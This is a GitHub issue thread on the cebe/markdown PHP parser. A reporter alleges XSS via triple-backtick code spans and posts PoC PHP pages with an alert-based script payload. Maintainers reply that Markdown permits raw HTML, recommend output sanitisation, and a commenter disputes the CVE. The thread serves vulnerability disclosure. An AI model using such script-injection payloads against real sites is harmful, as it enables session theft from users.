Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Inconsistent behavior of multiple backticks #166

Open
Ekultek opened this issue Dec 5, 2018 · 29 comments
Open

Inconsistent behavior of multiple backticks #166

Ekultek opened this issue Dec 5, 2018 · 29 comments
Labels
Milestone

Comments

@Ekultek
Copy link

Ekultek commented Dec 5, 2018

Issue

There is a reflected and/or stored xss vulnerability (depending on how the markdown is parsed from user input or from a user uploaded file) from a crafted use of backticks, in all of the following parsers:

  • GithubMarkdown
  • Markdown
  • MarkdownExtra

How?

The vulnerability occurs when a user crafts a malicious payload with characters before a 3 backtick wrapped payload, thus bypassing the parser escape. For example, here is an image of the payloads crafted with single, double, and triple backticks:

craftedpayloads

And here is an image of the payloads rendered:

renderedpayloads

As you can see when the payload is crafted correctly using three backticks, the parser will render it as a script, this can allow malicious individuals to render scripts within a .md file or within a text box on any platform that is using this as the markdown parser. An example of a ran script:

runningthescript

Impact

Doing a quick search on Github for the code that enables your parser: new \cebe\markdown\. I get this many results:

parserenable

The vulnerability can be either stored using an .md file (README for example), or reflected if the markdown parser is just parsing the user input text. Malicious attackers can use this method to steal sensitive user data. For example to steal a users cookies:

cookiestealer

This can allow serious impacts on not only the end users using the site, but the reputation of the website as well.

Proof of Concept

User input

You can use the following code for a PoC on user entered text:

<?php
/*
 * to run this PoC do the following:
 * composer require cebe/markdown "~1.2.0"
 *
 * For proof that the markdown is not sent as a script do:
 * `<script>alert(1);</script>`
 * this will output the script in a safe way.
 *
 * To make an alert do:
 * L: ```<script>alert(1);</script>```
 * this will display a rendered alert
 * */
include 'vendor/autoload.php';

function parseData($data) {
    $parserGithub = new cebe\markdown\GithubMarkdown();
    $parserMarkdown = new cebe\markdown\Markdown();
    $parserMarkdownExtra = new cebe\markdown\MarkdownExtra();
    return [
        "<div class='parsed-github'>".$parserGithub->parse($data)."</div>",
        "<div class='parsed-markdown'>".$parserMarkdown->parse($data)."</div>",
        "<div class='parsed-markdown-extra'>".$parserMarkdownExtra->parse($data)."</div>"
    ];
}

if (isset($_GET['poc'])) {
    $parsed = parseData($_GET['poc']);
    echo "<!doctype html>
<title>PoC</title>
<body>
{$parsed[0]}
{$parsed[1]}
{$parsed[2]}
</body>";
} else {
    echo "<!doctype html>
<head>
<title>PoC</title>
</head>
<body>
<form action='#'>
<label for='markdown-poc'>Markdown: </label>
<input id='markdown-poc' type='text' name='poc'>
<input type='submit' name='Submit'>
</form>
</body>";
}

MD file

And you can use the following code for a PoC on text read from an MD file:

<?php
/*
 * to use this PoC you will need composer to require the library:
 * `composer require cebe/markdown "~1.2.0"`
 *
 * After this has been done you can create an MD file anywhere on your system,
 * to verify that the parser to render the data in a safe way use `<script>alert(1);</script>`,
 * or whatever script you decide to use
 *
 * In order to get the data rendered as javascript:
 * L: ```<script>alert();</script>``` or whatever script you decide to render
 * */
include 'vendor/autoload.php';

function renderFileContent($fname) {
    return file_get_contents($fname);
}
if (isset($_POST['upload'])) {
    $tmpName = $_FILES['poc']['tmp_name'];
    $contents = renderFileContent($tmpName);
    $parserGithub = new cebe\markdown\GithubMarkdown();
    $parserMarkdown = new cebe\markdown\Markdown();
    $parserMarkdownExtra = new cebe\markdown\MarkdownExtra();
    $dataGithub = $parserGithub->parse($contents);
    $dataMarkdown = $parserMarkdown->parse($contents);
    $dataMarkdownExtra = $parserMarkdownExtra->parse($contents);
    $parsed = [
        "<div class='parsed-github'>" . $parserGithub->parse($dataGithub) . "</div>",
        "<div class='parsed-markdown'>" . $parserMarkdown->parse($dataMarkdown) . "</div>",
        "<div class='parsed-markdown-extra'>" . $parserMarkdownExtra->parse($dataMarkdownExtra) . "</div>"
    ];
    echo "<!doctype html>
<head>
<title>PoC</title>
</head>
<body>
{$parsed[0]}
{$parsed[1]}
{$parsed[2]}
</body>";
} else {
    echo "<!doctype html>
<head>
<title>PoC</title>
</head>
<body>
<form action='#' method='post' enctype='multipart/form-data'>
<span>Upload file:</span>
<input type='file' name='poc'>
<input type='submit' name='upload' value='Upload'>
</form>
</body>
";
}
@samdark
Copy link
Contributor

samdark commented Dec 5, 2018

Markdown doesn't ensure output is secure in any way by design. It is allowing HTML so you don't need to craft it like that, just use <script directly.

@samdark
Copy link
Contributor

samdark commented Dec 5, 2018

I don't think escaping HTML is the job of markdown processing library.

@Ekultek
Copy link
Author

Ekultek commented Dec 5, 2018

@samdark then why does it escape it if the payload isnt crafted?

@samdark
Copy link
Contributor

samdark commented Dec 5, 2018

It's by design of markdown: https://daringfireball.net/projects/markdown/syntax#autoescape

@samdark
Copy link
Contributor

samdark commented Dec 5, 2018

That's expected. You should process result of markdown conversion with something like http://htmlpurifier.org/ if you want to allow users to enter text.

@Ekultek
Copy link
Author

Ekultek commented Dec 5, 2018

@samdark I shouldn't need to rely on a second library because one of them doesn't do its job properly

@samdark
Copy link
Contributor

samdark commented Dec 5, 2018

Please re-read markdown specification. It says explicitly that it allows any HTML by design and it's unsafe by definition to allow users to enter markdown w/o further escaping/cleanup.

@samdark
Copy link
Contributor

samdark commented Dec 5, 2018

It's not the job of the markdown parser to escape/cleanup output.

@samdark
Copy link
Contributor

samdark commented Dec 5, 2018

@Ekultek
Copy link
Author

Ekultek commented Dec 5, 2018

The point of a parser is to render the data in a safe way. You're saying I should rely on a second library to render the data in a safe way, why should I have to do that when this parser is already here and should do that for me?

@samdark
Copy link
Contributor

samdark commented Dec 5, 2018

The point of a parser is to render the data in a safe way.

No since it's a markdown parser and markdown wasn't meant to be safe.

You're saying I should rely on a second library to render the data in a safe way

Yes.

why should I have to do that when this parser is already here and should do that for me?

This parser converts markdown to HTML. Markdown, by definition, allows any HTML and that is unsafe if you allow users to enter data you render. There are valid use cases for non-filtered HTML. For example, you can allow full markdown for admin only and that's huge flexibility. You can do things like this by embedding HTML and CSS into blog post.

@samdark
Copy link
Contributor

samdark commented Dec 5, 2018

@cebe I think security topic should be emphasized in readme pointing to HTMLPurifier.

@Ekultek
Copy link
Author

Ekultek commented Dec 5, 2018

@samdark I think you should incorporate HTMLPurifier into the code itself if that is what would be needed to fix the XSS issues in it. That would probably save you guys a lot of headache along with people like me who find bugs in stuff that they use sometimes. Thank you for your input I'll wait for @cebe

@cebe cebe closed this as completed in a91a7cb Dec 6, 2018
@cebe
Copy link
Owner

cebe commented Dec 6, 2018

Thanks for the detailed report. As pointed out by @samdark this is due to the nature of markdown and not a bug. You may remove HTML support by creating your own Markdown flavor class, which does not render the HTML, but the safest solution is to use HTML Purifier or similar tools.

I added a section in the README about this: https://github.com/cebe/markdown/blob/master/README.md#security

@Ekultek
Copy link
Author

Ekultek commented Dec 6, 2018

@cebe This still does not explain why it mitigates simplistic attacks such as:

`<script>alert(1);</script>`

into:

<code>&lt;script&gt;alert(1);&lt;/script&gt;</code>

If you are saying that the design of the parser allows this, then the simplistic attacks as stated would not work.

@cebe
Copy link
Owner

cebe commented Dec 6, 2018

Code tags are expected to display the raw text inside them, that means every HTML inside code tags is escaped properly. In your case above you had multiple code tags: ``` was converted to <code>`</code>, so the script tag was not inside the code tag in that case.

@Ekultek
Copy link
Author

Ekultek commented Dec 6, 2018

So then if that is the case, there is a bug in your code with multiple backticks.

@cebe
Copy link
Owner

cebe commented Dec 6, 2018

Well, the rendering is technically correct according to the markdown spec. If you use multiple backticks you need to leave space before and after the code.

But it seems other parsers are doing it differently....

https://johnmacfarlane.net/babelmark2/?normalize=1&text=something+%60%60%60%3Cscript%3E%60%60%60

@cebe cebe reopened this Dec 6, 2018
@cebe
Copy link
Owner

cebe commented Dec 6, 2018

related to #99

@cebe cebe changed the title Cross site scripting vulnerability Inconsistent behavior of multiple backticks Dec 6, 2018
@cebe cebe added the bug label Dec 6, 2018
@Ekultek
Copy link
Author

Ekultek commented Dec 6, 2018

I got the bug tag, never been more happy in my life lol

@cebe cebe added this to the 1.2.1 milestone Dec 7, 2018
@nunofernandes
Copy link

Any idea when we will have the 1.2.1?

Thanks,

@tyler-ham
Copy link

I just stumbled across CVE-2018-1000874 referencing this issue and wanted to leave a note with my thoughts. I disagree with the CVE-2018-1000874 being assigned as an XSS vulnerability in cebe/markdown.

Dispute of Vulnerability CVE-2018-1000874

I agree with @samdark that it is not the responsibility of the markdown processor to perform any escaping, cleanup, or sanitization outside of anything that might be required by the markdown specification of each respective markdown flavor.

Such additional escaping, cleanup, and sanitization would be no different than expecting json_decode() to strip out <script> tags. Suppose I have stored a user's comments as {"commented_at":"2019-07-03 12:45:00","comment":"Payload: <script>alert(1);</script>"}. Nobody would expect json_decode() to prevent the XSS vulnerability that is exposed when I save unsanitized user payload and then render it out to the browser as HTML. The vulnerability lies not within the decoder/parser, but in the code that invokes the decoder/parser and then presents the result to the browser as HTML.

Asking for the markdown parser to also perform sanitization isn't necessarily an invalid request, but it is a feature request, not a vulnerability bug to fix. However, since good sanitization libraries already exist, are easy to integrate, and have no coupling with the act of parsing markdown, it seems unnecessary and unwise to build such functionality into the parser.

Backtick Parsing

I readily concede that the Traditional Markdown specifications do not unambiguously describe the case demonstrated in this issue with respect to multiple backticks, but I think the current behavior is incorrect, and I agree with @cebe's renaming of the issue from "Cross site scripting vulnerability" to "Inconsistent behavior of multiple backticks".

Traditional Markdown Specification

The relevant portion of the Traditional Markdown specification says:

To include a literal backtick character within a code span, you can use multiple backticks as the opening and closing delimiters...

It goes on to show an example that begins and ends with two backticks with a single backtick contained inside:

``There is a literal backtick (`) here.``

produces:

<p><code>There is a literal backtick (`) here.</code></p>

Interpretation

My interpretation is that "you can use multiple backticks" seems to allow any number N of backticks to be selected as the open/close delimiter and that you are not required to have a string of N-1 backticks contained within them for the N backticks to be considered open/close delimiters.

CommonMark Specification for Comparison

This interpretation is consistent with the CommonMark specification, which attempts to provide a "standard, unambiguous syntax specification for Markdown." From the Code spans section of the specification:

A backtick string is a string of one or more backtick characters (`) that is neither preceded nor followed by a backtick.

A code span begins with a backtick string and ends with a backtick string of equal length. The contents of the code span are the characters between the two backtick strings...

Result of Interpretation

The result of this interpretation is that on the respective Payload lines, `, ``, ``` in the case demonstrated in this issue should be considered open/close delimiters so that:

Payload: `<script>alert(1);</script>`

Payload: ``<script>alert(1);</script>``

Payload: ```<script>alert(1);</script>```

produces:

<p>Payload: <code>&lt;script&gt;alert(1);&lt;/script&gt;</code></p>
<p>Payload: <code>&lt;script&gt;alert(1);&lt;/script&gt;</code></p>
<p>Payload: <code>&lt;script&gt;alert(1);&lt;/script&gt;</code></p>

@cebe
Copy link
Owner

cebe commented Jul 8, 2019

Hi, thanks for the detailed post. I was not aware of a CVE being assigned to this issue and I agree that this is not a security issue. The documentation in the README explains this situation in detail: https://github.com/cebe/markdown#security-considerations-

I have requested the CVE to be rejected.

@tyler-ham
Copy link

No problem. I also put in a request and just received this response from Mitre:

Thank you for your submission. CVE-2018-1000874 has been updated to a status of DISPUTED, with the rationale you have provided. These changes should be made public on cve.mitre.org within 1-2 hours.

@billythekid
Copy link

This is currently being reported by snyk It does mention it's "fixed" by way of the readme edit but I guess because these commits aren't published as a version yet it's still flagging it.

Might this get a push to a 1.2.1.1 / 1.2.2 so we can clear this up too?

@Ekultek
Copy link
Author

Ekultek commented Feb 1, 2020

I agree with the dispute, anyone coming here because of the CVE use a purification system before allowing anything from end users. They tend to do stupid stuff.

@cebe
Copy link
Owner

cebe commented Feb 26, 2020

I have contacted snyk and asked them to remove the report.

@cebe
Copy link
Owner

cebe commented Feb 26, 2020

FYI: The issue is not reported by snyk anymore.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

6 participants